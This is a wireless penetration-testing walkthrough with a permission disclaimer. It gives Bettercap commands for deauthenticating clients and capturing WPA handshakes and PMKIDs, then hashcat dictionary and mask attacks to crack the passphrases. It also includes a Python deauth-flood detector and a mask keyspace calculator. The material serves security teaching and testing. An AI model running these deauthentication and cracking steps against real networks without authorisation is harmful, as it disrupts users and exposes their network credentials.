Wireless Pentesting with Bettercap
This is a walkthrough for capturing wireless handshakes and PMKIDs with Bettercap and cracking them with Hashcat.
This is for educational purposes and is only to be performed on networks you have permission to test.
My notes on Wireless in general can be found here.
My notes on Hashcat can be found here.
This will require a WiFi adapter that supports monitor mode (and, for the deauthentication step, packet injection).
I myself have and recommend these adapters:
- Alfa AWUS036ACM (2.4GHz and 5GHz)
- Alfa AWUS036ACHM (2.4GHz and 5GHz)
- Alfa AWUS036ACH (2.4GHz and 5GHz; this more than likely *will* require driver installation)
- Panda Wireless PAU09 N600 (2.4GHz and 5GHz)
- Alfa AWUS036NEH
- Alfa AWUS036NH
- Panda Wireless PAU05
- TP-Link TL-WN722N
- Ralink USB WiFi RT5370
Bettercap
Handshake
First we need to find our interface and put it into monitor mode.
sudo airmon-ng start (interface name)
Now we start bettercap on that interface.
bettercap -iface (interface)
We begin scanning for networks
wifi.recon on
We can also show the manufacturer of each AP when listing the networks found so far.
set wifi.show.manufacturer true
wifi.show
Once we have picked a target, we lock recon onto its channel, start verbose sniffing into a pcap file named after the SSID, and watch the event stream.
wifi.recon.channel (Channel)
set net.sniff.verbose true
set net.sniff.output (SSID).pcap
net.sniff on
events.stream on
At this point we can simply wait for a device to connect to the network and capture the handshake, or we can deauthenticate the clients of that network so they reconnect.
wifi.deauth (BSSID)
Once we obtain the handshake, we will see a notification in our event stream.
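Because the capture step above relies on deauthentication frames, it is worth seeing how the same activity looks from the defender's side. The following Python script is an added example, not code from this post or from Bettercap: it parses raw 802.11 management frames (assumed to have any radiotap header already stripped), pulls the reason code out of deauthentication frames, and flags any BSSID that emits an unusual burst of them inside a sliding time window. The frames, BSSIDs, window and threshold are all constructed for the example. The mitigation on the network side is 802.11w (Protected Management Frames), which authenticates deauthentication frames so forged ones are ignored.

```python
import struct
from collections import defaultdict

# 802.11 frame-control encoding: bits 0-1 version, 2-3 type, 4-7 subtype
TYPE_MGMT = 0
SUBTYPE_BEACON = 8
SUBTYPE_DEAUTH = 12
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_80211(raw):
    """Parse the 24-byte 802.11 MAC header (no radiotap header assumed) and,
    for deauthentication frames, the 2-byte reason code that follows it."""
    if len(raw) < 24:
        return None
    fc = raw[0]
    frame = {
        "version": fc & 0x03,
        "type": (fc >> 2) & 0x03,
        "subtype": (fc >> 4) & 0x0F,
        "addr1": mac_str(raw[4:10]),    # receiver / destination
        "addr2": mac_str(raw[10:16]),   # transmitter / source
        "addr3": mac_str(raw[16:22]),   # BSSID for management frames
        "reason": None,
    }
    if (frame["type"] == TYPE_MGMT and frame["subtype"] == SUBTYPE_DEAUTH
            and len(raw) >= 26):
        frame["reason"] = struct.unpack_from("<H", raw, 24)[0]
    return frame


def find_deauth_storms(frames, window_s=10.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_frame_bytes).
    Returns {bssid: peak_count} for every BSSID whose number of deauth
    frames inside any window_s-second span reaches the threshold."""
    per_bssid = defaultdict(list)
    for ts, raw in frames:
        f = parse_80211(raw)
        if f and f["reason"] is not None:
            per_bssid[f["addr3"]].append(ts)
    storms = {}
    for bssid, times in per_bssid.items():
        times.sort()
        peak, start = 0, 0
        for end in range(len(times)):          # two-pointer sliding window
            while times[end] - times[start] > window_s:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            storms[bssid] = peak
    return storms


def sample_mgmt_frame(subtype, dst, src, bssid, body=b""):
    """Build the bytes of a minimal management frame for the constructed
    sample capture below (this only produces bytes in memory for parsing)."""
    fc = bytes([(subtype << 4) | (TYPE_MGMT << 2), 0x00])
    hexmac = lambda m: bytes.fromhex(m.replace(":", ""))
    return fc + b"\x00\x00" + hexmac(dst) + hexmac(src) + hexmac(bssid) + b"\x00\x00" + body


# Constructed sample: one beacon, then 8 broadcast deauths from AP within
# two seconds, then one lone deauth from another AP. Reason 7 ("class 3 frame
# from nonassociated STA") is the code a defender will typically see in floods.
AP = "aa:bb:cc:dd:ee:01"        # constructed BSSID
OTHER_AP = "aa:bb:cc:dd:ee:02"  # constructed BSSID
REASON_CLASS3 = struct.pack("<H", 7)
SAMPLE_FRAMES = [(0.0, sample_mgmt_frame(SUBTYPE_BEACON, BROADCAST, AP, AP))]
SAMPLE_FRAMES += [(1.0 + i * 0.25,
                   sample_mgmt_frame(SUBTYPE_DEAUTH, BROADCAST, AP, AP, REASON_CLASS3))
                  for i in range(8)]
SAMPLE_FRAMES.append((5.0, sample_mgmt_frame(SUBTYPE_DEAUTH, BROADCAST,
                                             OTHER_AP, OTHER_AP, REASON_CLASS3)))

if __name__ == "__main__":
    for bssid, n in find_deauth_storms(SAMPLE_FRAMES).items():
        print(f"possible deauth flood: {n} deauth frames from {bssid} within 10s")
```

On a real capture you would feed `find_deauth_storms` the frames from a monitor-mode pcap (stripping radiotap first) and tune `window_s` and `threshold` to the normal deauth rate of your own network; a sudden run of broadcast deauths with reason code 7 from one BSSID is the signature worth alerting on.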
PMKID
The PMKID method is much simpler. Just like before, we find our interface, enable monitor mode, and start bettercap on that interface.
We begin scanning for networks
wifi.recon on
We can also show the manufacturer of each AP when listing the networks found so far.
set wifi.show.manufacturer true
wifi.show
To start the PMKID attack we simply run
wifi.assoc (BSSID)
Once we have successfully received the RSN frame containing the PMKID and it has been saved in pcap format
Hashcracking with Hashcat
Now that we have our PMKID (or handshake) in pcap format, we can use hashcat to crack it. First we must convert the capture to hashcat's 22000 format with the hcxpcapngtool utility from hcxtools.
hcxpcapngtool -o CrackMe (.pcapng file)
Dictionary
If we want to run a dictionary attack, for example with rockyou.txt:
hashcat -a 0 -w 3 -m 22000 (hash file) (wordlist)
Depending on your hardware, the dictionary you chose, and the password, this may take some time. You can press S for a status update to see the estimated time to finish, as well as the updated Recovered.Total count of recovered keys.
We can run the same command again with --show appended to the end to see our cracked passwords.
Brute Force
If we wanted to run a brute-force (mask) attack rather than a dictionary attack, the command is similar:
hashcat -a 3 -w 3 -m 22000 (hash file) '?l?l?l?l?l?l?l'
Replace the ?l placeholders with whatever charsets we see fit:
* ?l = a-z
* ?u = A-Z
* ?d = 0-9
* ?h = 0-9a-f
* ?H = 0-9A-F
* ?s =  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~ (33 characters, the first of which is a space)
* ?a = ?l?u?d?s
* ?b = 0x00 - 0xff
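To see why mask length and charset size matter so much, here is an added Python helper (not part of this post and not part of hashcat) that computes the keyspace of a hashcat mask from the charset sizes listed above and turns it into a worst-case time estimate. The candidate rate is an assumption for illustration only; replace it with the H/s figure hashcat prints for mode 22000 on your own hardware. It also handles the two mask details a practitioner trips over: a literal character in the mask contributes exactly one candidate, and `??` stands for a literal question mark.

```python
# Sizes of hashcat's built-in charsets, from the list above
# (?s has 33 characters including the space; ?a = ?l?u?d?s = 95).
CHARSET_SIZES = {"l": 26, "u": 26, "d": 10, "h": 16, "H": 16,
                 "s": 33, "a": 95, "b": 256}


def mask_keyspace(mask):
    """Number of candidates a hashcat mask (-a 3) generates.

    Each '?x' placeholder multiplies the keyspace by the size of charset x,
    '??' is a literal question mark, and any other character is a fixed
    literal contributing exactly one candidate for its position.
    """
    total = 1
    i = 0
    while i < len(mask):
        if mask[i] == "?":
            if i + 1 >= len(mask):
                raise ValueError("dangling '?' at end of mask")
            tag = mask[i + 1]
            if tag == "?":
                size = 1
            elif tag in CHARSET_SIZES:
                size = CHARSET_SIZES[tag]
            else:
                raise ValueError(f"unknown charset '?{tag}'")
            i += 2
        else:
            size = 1
            i += 1
        total *= size
    return total


def seconds_to_exhaust(mask, candidates_per_second):
    """Worst-case time to try every candidate of the mask at the given rate."""
    return mask_keyspace(mask) / candidates_per_second


def humanize(seconds):
    """Render a duration in the largest convenient unit."""
    for unit, length in (("years", 365 * 86400), ("days", 86400),
                         ("hours", 3600), ("minutes", 60)):
        if seconds >= length:
            return f"{seconds / length:.1f} {unit}"
    return f"{seconds:.1f} seconds"


if __name__ == "__main__":
    # Assumed rate for illustration only; use the H/s value hashcat reports
    # for mode 22000 on your own GPU instead.
    RATE = 1_000_000
    for mask in ("?l?l?l?l?l?l?l",        # the 7-lowercase mask from the post
                 "?u?l?l?l?d?d?d?d",      # a typical "policy-compliant" 8-char shape
                 "?a?a?a?a?a?a?a?a",      # full printable ASCII, 8 characters
                 "?a" * 12):              # 12 printable characters
        print(f"{mask:28} keyspace={mask_keyspace(mask):.3e}  "
              f"exhaust={humanize(seconds_to_exhaust(mask, RATE))}")
```

The comparison is the point for anyone defending a network: a WPA/WPA2 passphrase is 8 to 63 characters, and a predictable 8-character shape such as one capital, three lowercase and four digits is a few billion candidates, while every extra position of a long random passphrase multiplies the keyspace by the charset size and moves the estimate from hours to geological time.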
This covers the basics of hash cracking with hashcat, but it can get far more advanced, especially when using rule sets like OneRuleToRuleThemAllStill and modern wordlists like rockyou2021.txt.